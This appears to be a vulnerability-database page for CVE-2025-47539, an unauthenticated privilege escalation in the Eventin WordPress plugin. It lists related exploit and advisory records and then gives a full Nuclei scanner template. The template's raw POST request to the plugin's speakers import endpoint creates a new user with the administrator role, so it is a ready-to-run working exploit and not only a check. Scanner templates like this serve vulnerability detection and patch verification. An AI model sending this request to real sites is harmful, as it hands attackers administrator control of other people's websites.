| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Mephisto | 21 May 202605:06 | – | githubexploit | |
| Exploit for Incorrect Privilege Assignment in Themewinter Eventin | 23 Feb 202622:03 | – | githubexploit | |
| Ntemplatesbyxit | 7 May 202615:36 | – | githubexploit | |
| Exploit for Incorrect Privilege Assignment in Themewinter Eventin | 17 May 202521:02 | – | githubexploit | |
| CVE-2025-47539 | 20 May 202521:02 | – | circl | |
| WordPress plugin Eventin 安全漏洞 | 23 May 202500:00 | – | cnnvd | |
| CVE-2025-47539 | 23 May 202512:43 | – | cve | |
| CVE-2025-47539 WordPress Eventin plugin <= 4.0.26 - Privilege Escalation Vulnerability | 23 May 202512:43 | – | cvelist | |
| EUVD-2025-28094 | 23 May 202512:43 | – | euvd | |
| CVE-2025-47539 | 23 May 202513:15 | – | nvd |
id: CVE-2025-47539
info:
name: Eventin <= 4.0.26 - Privilege Escalation
author: pdresearch
severity: critical
description: |
The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in the a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.
impact: |
Unauthenticated attackers can import users with arbitrary roles including administrator through a missing permission check in the REST API, leading to full site compromise.
remediation: |
Upgrade Eventin WordPress plugin to version 4.0.27 or later that implements proper permission checks on user import endpoints.
reference:
- https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability
- https://themewinter.com/eventin/
- https://nvd.nist.gov/vuln/detail/CVE-2025-47539
classification:
epss-score: 0.3092
epss-percentile: 0.98035
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-47539
cwe-id: CWE-269
metadata:
verified: true
max-request: 1
vendor: themewinter
product: eventin
fofa-query: body="/wp-content/plugins/eventin"
tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev,vuln
variables:
name: "{{randbase(5)}}"
oast: "oast.fun"
http:
- raw:
- |
POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9
------WebKitFormBoundaryS5Gx6VCxm3HMV2A9
Content-Disposition: form-data; name="speaker_import"; filename="speakers.json"
Content-Type: application/json
[
{
"id": "999",
"name": "{{name}}",
"email": "{{name}}@{{oast}}",
"image": "",
"designation": "test",
"summary": "",
"social": [
[]
],
"company_logo": "",
"company_url": "",
"speaker_group": "",
"speaker_category": [
"speaker"
],
"company_name": "",
"author_url": "",
"role": "administrator"
}
]
------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--
matchers:
- type: dsl
dsl:
- 'contains(body, "Successfully imported speaker")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
extractors:
- type: dsl # type of the extractor
dsl:
- '"Email: " + name + "@" + oast' # the variable to extract
# digest: 4b0a00483046022100e26bdf9b4c464720cc8c84e2454239dbf5e1dc32303294670ca77298bb675a7d022100f8805bfe7deb42e92b6bee1732cbe44b21aab271abb3e8ee389fb0c8d510977d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation